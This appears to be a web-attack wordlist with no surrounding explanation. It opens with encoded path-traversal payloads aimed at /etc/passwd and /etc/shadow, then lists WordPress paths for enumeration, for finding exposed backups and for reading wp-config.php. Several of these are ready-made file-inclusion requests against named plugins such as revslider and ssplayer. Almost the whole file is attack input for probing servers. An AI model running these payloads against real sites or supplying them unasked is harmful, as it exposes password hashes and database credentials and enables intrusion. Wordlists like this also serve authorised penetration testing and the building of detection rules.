%252e%2e%2f%252e%2e%2f%252e%2e%2f%252e%2e%2f/etc/passwd
/%2e/%2e/%2e/%2e/etc/shadow
%c0%af..%25c0%af..%25c0%af..%25c0%afetc%25c0%afpasswd
%c0%ae..%c0%ae..%c0%ae/etc/hosts
%25c0%25ae..%25c0%25ae/etc/shadow
%c1%1c..%c1%1c..%c1%1c/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
..%25c0%25af..%25c0%25afetc%25c0%25afpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/hosts
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# Common WordPress Vulnerabilities
/wp-admin/admin-ajax.php
/wp-json/wp/v2/users
/wp-json/wp/v2/posts
/xmlrpc.php
/wp-json/wp/v2/comments
/wp-login.php
/wp-config.php
/wp-admin
/wp-admin/admin-post.php
/wp-admin/admin.php
/wp-content
/wp-includes
/wp-content/plugins
/wp-content/themes
/wp-content/uploads
/wp-content/uploads/wp-config.php
/wp-content/uploads/wp-config.bak
/wp-content/uploads/backup.sql
/wp-config-sample.php
/readme.html
/license.txt
/wp-content/debug.log
/wp-cron.php
/wp-trackback.php
/wp-content/db.php
/wp-content/sitemap.xml
/wp-content/uploads/sitemap.xml
/wp-json
/wp-json/wp/v2
/wp-json/wp/v2/pages
/wp-json/wp/v2/settings
/wp-json/wp/v2/media
/wp-json/wp/v2/taxonomies
/wp-json/wp/v2/categories
/wp-json/wp/v2/tags
/wp-json/oembed/1.0/embed
/wp-json/oembed/1.0/proxy
/wp-json/jwt-auth/v1/token
/wp-json/jwt-auth/v1/token/validate
/wp-content/plugins/revslider/temp/update_extract/revslider
/wp-content/plugins/wp-symposium/server/php/index.php
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../wp-config.php
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../wp-config.php
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/pixelyoursite/includes
/wp-content/plugins/ssplayer/ssplayer.php?url=../../../../wp-config.php
/wp-content/plugins/membership-simplified-for-oap-members-only/membership/includes/download.php?download_file=../../../wp-config.php
/wp-content/uploads/wp-backup.sql
/wp-content/plugins/wpdatatables/config.json
/wp-content/ai1wm-backups
/wp-admin/options-general.php
/wp-admin/theme-editor.php
/wp-admin/plugin-editor.php
/wp-admin/user-edit.php
/wp-admin/tools.php
/wp-admin/update.php
/wp-admin/customize.php
/wp-content/advanced-cache.php
/wp-content/object-cache.php
/wp-content/wp-cache-config.php
/wp-content/backups/
/wp-content/backup-db
/wp-content/upgrade/
/wp-content/languages/
/wp-admin/network/
/wp-content/mu-plugins
/wp-content/mu-plugins/index.php
/wp-content/uploads/backup
/wp-content/uploads/backup.sql
/wp-content/uploads/backup-db
/wp-content/uploads/backups
/wp-content/uploads/backup-config.php
/wp-content/plugins/hello.php
/wp-content/plugins/akismet
/wp-content/plugins/akismet/akismet.php
/wp-content/plugins/akismet/readme.txt
/wp-content/plugins/contact-form-7/readme.txt
/wp-content/themes/twentytwenty/readme.txt
/wp-content/themes/twentytwenty/style.css
/wp-content/themes/twentytwenty/functions.php
/wp-content/themes/twentytwenty/footer.php
/wp-content/plugins/revslider/temp/update_extract
/wp-content/plugins/backupbuddy/readme.txt
/wp-content/plugins/duplicator/readme.txt
/wp-content/plugins/all-in-one-wp-migration
/wp-content/plugins/all-in-one-wp-migration/storage
/wp-content/plugins/all-in-one-seo-pack
/wp-content/plugins/all-in-one-seo-pack/all_in_one_seo_pack.php
/wp-content/plugins/wp-super-cache/readme.txt
/wp-content/themes/hello-elementor/style.css
/wp-content/themes/twentytwentyone/screenshot.png
/wp-content/themes/twentytwentyone/inc
/wp-content/plugins/yet-another-related-posts-plugin
/wp-content/plugins/yet-another-related-posts-plugin/readme.txt
/wp-content/plugins/woocommerce/templates
/wp-content/plugins/woocommerce/readme.txt
/wp-content/plugins/woocommerce/woocommerce.php
/wp-content/uploads/sites/
/wp-content/themes/
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

